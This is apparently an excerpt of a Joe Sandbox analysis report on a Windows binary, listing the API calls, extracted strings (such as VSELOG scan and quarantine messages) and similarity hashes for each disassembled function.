GetProcAddress.KERNEL32 ref: 0000000140004D62
GetFileAttributesW.KERNEL32 ref: 0000000140004DE9
LoadLibraryW.KERNEL32 ref: 0000000140004DF7
GetCurrentDirectoryW.KERNEL32 ref: 0000000140004E1C
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E27
LoadLibraryW.KERNEL32 ref: 0000000140004E30
SetCurrentDirectoryW.KERNEL32 ref: 0000000140004E41

Strings

SetDllDirectoryW, xrefs: 0000000140004D58
kernel32.dll, xrefs: 0000000140004D3C

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
String ID: SetDllDirectoryW$kernel32.dll
API String ID: 3184163350-3826188083
Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40

Function 0000000140004BA0 Relevance: 18.1, APIs: 9, Strings: 3, Instructions: 80memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140004BE7
GetProcessHeap.KERNEL32 ref: 0000000140004BF6
HeapAlloc.KERNEL32 ref: 0000000140004C04
lstrlenW.KERNEL32 ref: 0000000140004C3E
GetProcessHeap.KERNEL32 ref: 0000000140004C4D
HeapAlloc.KERNEL32 ref: 0000000140004C5B
lstrlenW.KERNEL32 ref: 0000000140004C8E
GetProcessHeap.KERNEL32 ref: 0000000140004C9D
HeapAlloc.KERNEL32 ref: 0000000140004CAB

Strings

ampIfEp, xrefs: 0000000140004C29, 0000000140004C6E
Security=impersonation static true, xrefs: 0000000140004C80, 0000000140004CBE
ncalrpc, xrefs: 0000000140004BAF, 0000000140004C17

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3424473247-996641649
Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700

Function 000000014000A740 Relevance: 16.9, APIs: 11, Instructions: 354COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000A7AA
GetLastError.KERNEL32 ref: 000000014000A7BA
MultiByteToWideChar.KERNEL32 ref: 000000014000A874
MultiByteToWideChar.KERNEL32 ref: 000000014000A921
LCMapStringW.KERNEL32 ref: 000000014000A944
LCMapStringW.KERNEL32 ref: 000000014000A98D
LCMapStringW.KERNEL32 ref: 000000014000AA24
WideCharToMultiByte.KERNEL32 ref: 000000014000AA65
LCMapStringA.KERNEL32 ref: 000000014000AB13
LCMapStringA.KERNEL32 ref: 000000014000ABC6
LCMapStringA.KERNEL32 ref: 000000014000AC4C

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: String$ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1775797328-0
Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700

Function 0000000140009C30 Relevance: 16.6, APIs: 11, Instructions: 150COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
String ID:
API String ID: 1232609184-0
Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300

Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001B48
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001BE6

EnterCriticalSection.KERNEL32 ref: 00000001400027B2
LeaveCriticalSection.KERNEL32 ref: 000000014000286E
GetProcessHeap.KERNEL32 ref: 000000014000287F
HeapFree.KERNEL32 ref: 000000014000288D
GetProcessHeap.KERNEL32 ref: 000000014000289D
HeapFree.KERNEL32 ref: 00000001400028AB
GetProcessHeap.KERNEL32 ref: 00000001400028BB
HeapFree.KERNEL32 ref: 00000001400028C9
GetProcessHeap.KERNEL32 ref: 00000001400028D9
HeapFree.KERNEL32 ref: 00000001400028E7

Strings

H, xrefs: 000000014000278C

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$CriticalSection$EnterFreeProcess$Leave
String ID: H
API String ID: 2107338056-2852464175
Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300

Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

#4.VSELOG ref: 0000000140003242
EnterCriticalSection.KERNEL32 ref: 0000000140003257
LeaveCriticalSection.KERNEL32 ref: 00000001400032D9
#4.VSELOG ref: 0000000140003353

Part of subcall function 0000000140002B40: LoadLibraryW.KERNEL32 ref: 0000000140002B91
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BAD
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BC8
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BE3
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

#4.VSELOG ref: 0000000140003389
SetWaitableTimer.KERNEL32 ref: 00000001400033BE

Strings

fnCallback: hScan=%d, quarantine, result %d, xrefs: 000000014000333F
fnCallback: hScan=%d, evId=%d, context=%p, xrefs: 000000014000323B
fnCallback: hScan=%d, putting event %d into listening threads queues, xrefs: 0000000140003372

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
API String ID: 1322048431-2685357988
Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740

Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON

Download Yara Rule

APIs

#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003D84
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003DA3
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E19
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E25
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E66
SetWaitableTimer.KERNEL32 ref: 0000000140003EA6

Strings

doCleanup: pid %d, marking the cAmpEntry pointer for deletion, xrefs: 0000000140003E58
doCleanup: pid %d, removing cAmpEntry, index is %d, xrefs: 0000000140003E08
doCleanup: enter, cAmpEntry %p, xrefs: 0000000140003D76

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
API String ID: 2984211723-3002863673
Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710

Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 00000001400021D4
OpenProcess.KERNEL32 ref: 00000001400021F7
#4.VSELOG ref: 000000014000223A
WaitForMultipleObjects.KERNEL32 ref: 000000014000224F
CloseHandle.KERNEL32 ref: 000000014000225A
#4.VSELOG ref: 0000000140002294

Strings

doMonitor: monitoring process id=%d, xrefs: 000000014000222C
doMonitor: end process id=%d, result from WaitForMultipleObjects=%d, xrefs: 0000000140002283
fnMonitor: monitor thread for ctx %p, xrefs: 00000001400021C6

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CloseHandleMultipleObjectsOpenProcessWait
String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
API String ID: 678758403-4129911376
Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710

Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140001797
GetProcessHeap.KERNEL32 ref: 00000001400017A6
HeapAlloc.KERNEL32 ref: 00000001400017B4
lstrlenW.KERNEL32 ref: 00000001400017EC
GetProcessHeap.KERNEL32 ref: 00000001400017FB
HeapAlloc.KERNEL32 ref: 0000000140001809
lstrlenW.KERNEL32 ref: 000000014000183F
GetProcessHeap.KERNEL32 ref: 000000014000184E
HeapAlloc.KERNEL32 ref: 000000014000185C
lstrlenW.KERNEL32 ref: 000000014000188D
GetProcessHeap.KERNEL32 ref: 000000014000189C
HeapAlloc.KERNEL32 ref: 00000001400018AA

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID:
API String ID: 3424473247-0
Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700

Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140011270: RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

__GetUnwindTryBlock.LIBCMT ref: 0000000140012CDD
__SetUnwindTryBlock.LIBCMT ref: 0000000140012D05
__GetUnwindTryBlock.LIBCMT ref: 0000000140012D15
_SetThrowImageBase.LIBCMT ref: 0000000140012DA6

Strings

csm, xrefs: 0000000140012D2F
csm, xrefs: 0000000140012E97
csm, xrefs: 0000000140012DC1
bad exception, xrefs: 0000000140012E4A

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
String ID: bad exception$csm$csm$csm
API String ID: 3766904988-820278400
Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700

Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140004A0F
LeaveCriticalSection.KERNEL32 ref: 0000000140004A1D
WaitForMultipleObjects.KERNEL32 ref: 0000000140004A44
Sleep.KERNEL32 ref: 0000000140004A75
EnterCriticalSection.KERNEL32 ref: 0000000140004A7F
SetEvent.KERNEL32 ref: 0000000140004AC5
ResetEvent.KERNEL32 ref: 0000000140004ACF
LeaveCriticalSection.KERNEL32 ref: 0000000140004AD9
WaitForMultipleObjects.KERNEL32 ref: 0000000140004B0D

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
String ID:
API String ID: 2707001247-0
Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708

Function 00007FFDAC124804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFDAC124861

Part of subcall function 00007FFDAC126BC4: __GetUnwindTryBlock.LIBCMT ref: 00007FFDAC126C07
Part of subcall function 00007FFDAC126BC4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFDAC126C2C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFDAC124939
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFDAC124B87
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDAC124C94

Strings

csm, xrefs: 00007FFDAC12487B
csm, xrefs: 00007FFDAC1248E2
csm, xrefs: 00007FFDAC12495C

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction ID: 1904bf4f701bddb79ca2b5edeeecec9282e7d5d64dc83fcb463d754f8d26ec81
Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction Fuzzy Hash: 3CD19E3BB097418AEB22DB2594603AD77A4FB457E8F500135EE8D57B96CF38E091C70A

Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014000169E
HeapFree.KERNEL32 ref: 00000001400016B0
GetProcessHeap.KERNEL32 ref: 00000001400016C0
HeapFree.KERNEL32 ref: 00000001400016D2
GetProcessHeap.KERNEL32 ref: 00000001400016E2
HeapFree.KERNEL32 ref: 00000001400016F4
GetProcessHeap.KERNEL32 ref: 0000000140001704
HeapFree.KERNEL32 ref: 0000000140001716
GetProcessHeap.KERNEL32 ref: 0000000140001726
HeapFree.KERNEL32 ref: 0000000140001738

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601

Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014001371E
HeapFree.KERNEL32 ref: 0000000140013730
GetProcessHeap.KERNEL32 ref: 0000000140013740
HeapFree.KERNEL32 ref: 0000000140013752
GetProcessHeap.KERNEL32 ref: 0000000140013762
HeapFree.KERNEL32 ref: 0000000140013774
GetProcessHeap.KERNEL32 ref: 0000000140013784
HeapFree.KERNEL32 ref: 0000000140013796
GetProcessHeap.KERNEL32 ref: 00000001400137A6
HeapFree.KERNEL32 ref: 00000001400137B8

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601

Function 00007FFDAC12B86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FFDAC12B9E8
GetProcAddress.KERNEL32 ref: 00007FFDAC12B9F4

Strings

ext-ms-, xrefs: 00007FFDAC12B945
api-ms-, xrefs: 00007FFDAC12B932

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction ID: 0facb9160bf1c3bd8f0952b8a2878c0c84679e04fa23577eee6e2b6e7395a644
Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
